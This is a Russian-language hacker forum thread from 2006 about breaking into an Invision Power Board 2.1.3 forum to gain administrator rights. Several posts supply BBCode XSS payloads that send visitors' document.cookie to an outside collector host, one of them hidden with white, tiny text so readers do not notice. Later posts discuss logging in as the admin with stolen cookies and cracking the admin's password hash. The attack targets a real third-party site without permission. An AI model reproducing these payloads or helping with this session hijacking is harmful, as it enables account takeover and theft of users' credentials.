Как спрятать сниффер под Opera в Ipb 2.1.3

Discussion in 'Песочница' started by Kragen, 6 Jan 2006.

  1. Kragen

    Kragen New Member

    Joined:
    3 Jan 2006
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Есть форум Invision Power Board v2.1.3
    Проблема - достать права Админа.. =(

    Главная проблема в том, что ВСЕ! коды видно в Опере...

    Я долго думал, пробовал разные комбинацыи и нашел код, который нигде (ни в Опере, ни в ИЕ) не видно, НО, он не работает как снифер...

    Вот сам коД:

    [COLO*R=[IM*G]http://aaa.aa/=`aaa.jpg[/I*MG]` style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)] [/COL*OR]

    Кто скажет, в чем проблема ? Почему код не работает?...

    Заранее спасибо.
     
  2. sssssssssssq

    sssssssssssq Banned

    Joined:
    8 Aug 2005
    Messages:
    669
    Likes Received:
    426
    Reputations:
    335
    А ещё варианты есть какие нить??? Попробуй сплойтом.
    И ещё, дай ссылку на сайт, я посмотрю.
     
  3. Kragen

    Kragen New Member

    Joined:
    3 Jan 2006
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Просто сплойт почему-то не работает =( Пробовал на 8 форумах ИПБ, нигде не находил хэши...
    Может проблема в сплойте... я это $allchar .= chr($char); исправил, но он все-равно не работает... провил и на $allchar .= chr($i);

    А в КОДе выше в чем может быть проблема ?


    Вот сайт :

    http://www.ссылки в личку!.com/forum/index.php?
     
    #3 Kragen, 6 Jan 2006
    Last edited by a moderator: 6 Jan 2006
  4. Kragen

    Kragen New Member

    Joined:
    3 Jan 2006
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Кстати, может быть проблема в этом ??
    Что я после src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) ---> ; не поставил ?
    Типа так : src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);

    ???
     
  5. sssssssssssq

    sssssssssssq Banned

    Joined:
    8 Aug 2005
    Messages:
    669
    Likes Received:
    426
    Reputations:
    335
    Найдена XSS
    alert
    Code:
    [e*mail]wj@wj[u*rl=http://www.wj.com`=`][/u*rl].com[/e*mail] ` style=`background:url(javaSCrip	t:alert(/wj/))`
    cookie
    Code:
    [em*ail]wj@wj[u*rl=http://www.wj.com`=`][/ur*l].com[/em*ail] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
    Звёздочки поубирай в тэгах.
     
    #5 sssssssssssq, 6 Jan 2006
    Last edited: 6 Jan 2006
  6. sssssssssssq

    sssssssssssq Banned

    Joined:
    8 Aug 2005
    Messages:
    669
    Likes Received:
    426
    Reputations:
    335
    Я только что проверял, всё работает... Барсик, ты чего.... Вот только что проверял!

    Неее... Сплойтом не пробывал, так быстренько, на скорую руку посмотрел, XSS есть, читай статью WJ...
    Она поможет...
    Незабываем про репутацию! ;)
     
  7. Kragen

    Kragen New Member

    Joined:
    3 Jan 2006
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Блин, в Опере всеравно коды отображаются =(

    А реально что-то сделать в том коде, что-бы и в Опере его небыло видно ?
     
    #7 Kragen, 6 Jan 2006
    Last edited: 6 Jan 2006
  8. Barsik

    Barsik Блoxacтый

    Joined:
    16 Jan 2005
    Messages:
    267
    Likes Received:
    238
    Reputations:
    182
    У меня не работает :(
    Что не так сделал?
    www.barsik.jino-net.ru/forum.jpg
    В опере нельзя сделать, но можно код спрятать
    Под цвет фона
     
    #8 Barsik, 6 Jan 2006
    Last edited: 6 Jan 2006
  9. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    Ошибочка у тебя на скрине по мойму
    Попробуй так:
    PHP:
    [color=#FFF][size=-7][email]wj@wj[url=http://www.wj.com`=`][/url].com[/email]`style=`background:url(javaSCript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/size][/color]
     
    #9 Otaku, 7 Jan 2006
    Last edited: 7 Jan 2006
  10. Barsik

    Barsik Блoxacтый

    Joined:
    16 Jan 2005
    Messages:
    267
    Likes Received:
    238
    Reputations:
    182
    Нет даже так не работает. Ну ладно ничего страшного :)
     
  11. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    tam forum 99% propat4en
    proveryal davno eshe na localhoste pashet vrode :p
     
  12. Kragen

    Kragen New Member

    Joined:
    3 Jan 2006
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Всем спасибо, уже сам разобрался =) Чуть переделал один КОД...
     
  13. Kragen

    Kragen New Member

    Joined:
    3 Jan 2006
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Вот возник еще вопрос по ИПБ...
    Я достал ИД и Хэш админа...

    1. Если я войду на форум (через смену кукисов) под аккаунтом того админа, который уже есть онлайн... что будет ? (ему что-то напишет, что под его ником зашли с другого ИП, или все будет норм и он не заметит?)

    2. Нащет Хэша: Можно ли его как-то расшифровать ? Форум: Invision Power Board v2.1.3. Как я понял, там не МД5 ?
     
  14. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    2) нет расшифровать не сможешь, почему не скажу
     
  15. Kragen

    Kragen New Member

    Joined:
    3 Jan 2006
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Как узнать пароль Админа, если есть его логин, ИД и Хэш ?
     
  16. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Пароль может быть в хэше Md5. Пароль может быть в хэше md5 и ещё раз в хэше md5. Пароль может быть в md5+md5соль и всё это вместе в md5. И так далее.

    Как узнать? Узнать как пароль зашифрован и зделать выводы. К просмотру рекомендую видео от Coyl про расшифровку паролей в IPB 2.*.*

    PS. Чесно говоря ожидал этого вопроса.
     
  17. slime

    slime New Member

    Joined:
    8 Dec 2005
    Messages:
    30
    Likes Received:
    1
    Reputations:
    -2
    и что у тебя за код получился, который в опере работает?